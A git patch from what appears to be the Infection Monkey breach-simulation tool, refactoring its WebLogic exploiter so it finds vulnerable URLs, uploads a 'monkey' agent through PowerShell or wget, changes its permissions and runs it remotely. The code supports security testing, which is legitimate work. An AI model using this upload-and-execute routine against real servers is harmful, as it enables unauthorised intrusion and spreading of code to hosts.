From 10528c313dfad0fa8fe26e17edff0ab663670da9 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Fri, 17 Aug 2018 13:46:14 +0300 Subject: [PATCH] Webblogic refactored to web RCE framework changes(from static methods into class methods) --- infection_monkey/exploit/weblogic.py | 28 ++++++++++------------------ 1 file changed, 10 insertions(+), 18 deletions(-) diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index 524d9a005..c2b6e81a9 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -10,7 +10,7 @@ from requests import post, exceptions from web_rce import WebRCE from exploit.tools import get_free_tcp_port, get_interface_to_target from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer -from model import POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, WGET_HTTP_UPLOAD +from model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD import threading import logging @@ -46,17 +46,17 @@ class WebLogicExploiter(WebRCE): _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): - super(WebLogicExploiter, self).__init__(host) + super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh', + 'win32': 'monkey-32.exe', + 'win64': 'monkey-64.exe'}) def exploit_host(self): # Get open ports - ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"]) + ports = self.get_ports_w(self.HTTP, ["http"]) if not ports: return False # Get urls to try to exploit - urls = WebRCE.build_potential_urls(self.host, ports, URLS) - - exploiter = self.exploit + urls = self.build_potential_urls(ports, URLS) # Checking takes a lot of time, so we check until we get exploitable url and stop vulnerable_urls = [] @@ -69,24 +69,16 @@ class WebLogicExploiter(WebRCE): if not vulnerable_urls: return False - # Somehow we can't save files outside server's directory - config = copy.deepcopy(self._config) - config.dropper_target_path_win_32 = 'monkey-32.exe' - config.dropper_target_path_win_64 = 'monkey-64.exe' - config.dropper_target_path_linux = './monkey.sh' - - data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], - {'windows': POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, - 'linux': WGET_HTTP_UPLOAD}) + data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD}) # We can't use 'if not' because response may be '' - if not data or data['response'] == False: + if not data or data['response'] is False: return False - if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + if self.change_permissions(vulnerable_urls[0], data['path']) is False: return False - if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], False) == False: + if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False: return False return True